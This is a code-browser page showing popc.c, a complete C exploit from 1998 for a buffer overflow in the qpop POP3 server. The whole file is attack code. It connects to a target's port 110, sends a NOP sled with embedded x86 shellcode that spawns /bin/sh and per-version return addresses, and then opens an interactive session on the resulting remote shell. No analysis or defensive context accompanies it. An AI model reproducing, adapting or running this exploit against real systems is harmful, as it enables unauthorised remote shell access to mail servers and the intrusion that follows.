Logo Search packages:      
Sourcecode: raccess version File versions  Download package

popc.c

/* qpop buffer overflow exploit (pop_msg)
 * Mon Jun 29 01:26:06 GMT 1998 - herp
 *                                Herbert Rosmanith
 *                                herp@wildsau.idv.uni-linz.ac.at
 */

#include "../src/raccess.h"

long addrlist[]={
  0xbfffeee4,             /*2.2*/
  0xbfffec2c              /*2.41beta1*/
};

char shellcode[] =
  "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
  "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
  "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
  "\xff\xff/bin/sh.........";

void die(char *s)
{
  if (errno) perror(s);
  else fprintf(stderr,"%s\n",s);
  exit(-1);
}

void wusage()
{
  printf("qpush [-index] <hostname>\n"
         " -0 QPOP Version 2.2             (default)\n"
         " -1 QPOP Version 2.41beta1\n");
  exit(0);
}

int resolv(char *host,long *ipaddr)
{
  if (isdigit(host[0]))
    {
      *ipaddr=inet_addr(host);
      if (*ipaddr==-1) return -1;
    }
  else
    {
      struct hostent *hp;
      if ((hp=gethostbyname(host))==NULL)
        {
          fprintf(stderr,"tc: %s: unknown host\n");
          exit(-1);
        }
      *ipaddr=*(unsigned long *)hp->h_addr;
    }
  return 0;
}

int connect_to(char *hostname,short port)
{
  struct sockaddr_in s_in;
  int s;

  s=socket(PF_INET,SOCK_STREAM,0);
  if (s==-1) die("socket");

  if (resolv(hostname,(long *)&s_in.sin_addr.s_addr)==-1)
    die("unknown host");
  s_in.sin_family=AF_INET;
  s_in.sin_port=htons(port);

  if (connect(s,(struct sockaddr *)&s_in,sizeof(s_in))==-1)
    die("connect");

  return s;
}

void socket_read(int s,char *buf,int len)
{
  int i;
  switch(i=read(s,buf,len))
    {
    case -1:
      die("unexpected EOF");
    case  0:
      die("EOF");
    default:
      buf[i]=0;
      //printf("%s",buf);
      break;
    }
}

void terminal(int s)
{
  char buf[1024];
  fd_set rfds;
  fd_set fds;
  int i;

  for (i=0;i<NSIG;i++) signal(i,SIG_IGN);
  FD_ZERO(&fds);
  FD_SET(0,&fds);
  FD_SET(s,&fds);
  for (;;)
    {
      memcpy(&rfds,&fds,sizeof(fds));
      i=select(s+1,&rfds,NULL,NULL,NULL);
      if (i==-1) die("select");
      if (i==0) die("session closed");
      if (FD_ISSET(s,&rfds))
        {
          if ((i=read(s,buf,sizeof(buf)))<1)
            die("session closed");
          write(1,buf,i);
        }
      if (FD_ISSET(0,&rfds))
        {
          if ((i=read(0,buf,sizeof(buf)))<1)
            die("session closed");
          write(s,buf,i);
        }
    }
}

int main(int argc,char *argv[])
{
  char buf[1024+128];
  int s,i,ix;

  if (argc>=2 && argv[1][0]=='-')
    {
      ix=atoi(&argv[1][1]);
      argc--;
      argv++;
    }
  else ix=0;

  if (argc!=2 || ix>sizeof(addrlist)/sizeof(long))
    wusage();

  s=connect_to(argv[1],110);      /* WKS POP3 */
  socket_read(s,buf,sizeof(buf));
  memset(buf,0x90,sizeof(buf));
  for (i=981;i<981+10*4;i+=4)
    memcpy(&buf[i],&addrlist[ix],4);
  memcpy(&buf[941],shellcode,strlen(shellcode));
  buf[sizeof(buf)-3]=0x0d;
  buf[sizeof(buf)-2]=0x0a;
  buf[sizeof(buf)-1]=0x00;
  write(s,buf,sizeof(buf));
  socket_read(s,buf,sizeof(buf));
  terminal(s);

}
/*                    www.hack.co.za              [2000]*/

Generated by  Doxygen 1.6.0   Back to index